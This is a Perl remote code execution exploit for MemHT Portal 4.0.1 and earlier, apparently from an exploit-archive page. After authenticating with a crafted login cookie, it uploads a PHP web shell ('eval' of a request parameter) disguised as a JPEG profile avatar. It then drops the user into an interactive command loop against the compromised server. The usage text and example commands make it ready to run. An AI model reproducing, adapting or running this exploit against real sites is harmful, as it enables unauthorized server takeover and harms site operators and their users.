MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit

2009-01-25 06:16:20

#!/usr/bin/perl
# MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit
# by yeat - staker[at]hotmail[dot]it

use Getopt::Std;
use Digest::MD5('md5_hex');
use LWP::UserAgent;


getopts('p:',\my %opts);

my ($host,$file,$id,$username,$password) = @ARGV;

my $http = new LWP::UserAgent;
my $u_agent = "Lynx (textmode)";
my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password);


Main::RunExploit();


# Main Package

package Main;


sub Usage {

return print <<EOF;
+--------------------------------------------------------------+
| MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit |
+--------------------------------------------------------------+
by yeat - staker[at]hotmail[dot]it

Usage: perl xpl.pl host/path file id user pass [OPTIONS]
host: target host and memht path
file: file to upload
user: valid username
pass: valid password
id: user id

Options:

-p [specify a proxy] [server]:[port]

Example:
perl xpl.pl localhost/memht yeat.php 38 MrJack obscure
perl xpl.pl localhost/memht yeat.php 38 MrJack obscure -p 213.151.89.109:80

EOF

}


sub RunExploit
{
if (defined $opts{p}) {
HTTP::Proxy($opts{p});
}

if (@ARGV < 5 || @ARGV > 7) {
Main::Usage();
}
else {
HTTP::UserAgent($u_agent);
MemHT::Login();
MemHT::Exploit($file);
}
}




# MemHT Exploit Package

package MemHT;

sub Exploit
{
my $resp;
my $file = shift(@_);
my $path = "/index.php?page=users&op=editProfile";

my $data = {
chg_email => '[email protected]',
avatar => [
undef,
$file,
Content_Type => 'image/jpeg',
Content => '<?php error_reporting(E_ALL); eval($_REQUEST[\'cmd\']); ?>',
# Content => 'Here you can write everything :) this is an example!',
],
chg => 'true',
Submit => 'Modify',
};

my $send = $http->post('http://'.$host.$path,
$data,
Content_Type => 'multipart/form-data',
);

if ($send->as_string =~ m{logout}i) {
print "File Uploaded! / $host/images/avatar/uploaded/$file\n\n";

while (1) {
print "\n[yeat-PHPshell]:~# ";
chomp(my $content = <STDIN>);
$resp = HTTP::GET("$host/images/avatar/uploaded/$file?cmd=$content");
print $resp->content;
}
}
else {
print "Exploit Failed!\n";
exit;
}
}


sub Login
{
HTTP::Cookies($cookies);
my $response = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage');

if ($response->content =~ /access denied/i) {
print "Login Failed!\n";
exit;
}
}



# HTTP Package

package HTTP;


sub Cookies
{
return $http->default_header('Cookie' => $_[0]);
}

sub UserAgent
{
return $http->agent($_[0]);
}

sub GET
{
if ($_[0] !~ m{^http://(.+?)$}i) {
return $http->get('http://'.$_[0]);
}
else {
return $http->get($_[0]);
}
}

sub POST
{
if ($_[0] !~ m{^http://(.+?)$}i) {
return $http->post('http://'.$_[0]);
}
else {
return $http->post($_[0]);
}
}

sub http_header
{
return $http->default_header($_[0]);
}

sub Proxy
{
return $http->proxy('http', 'http://'.$_[0]);
}

#

Fixes

No fixes

In order to submit a new fix you need to be registered.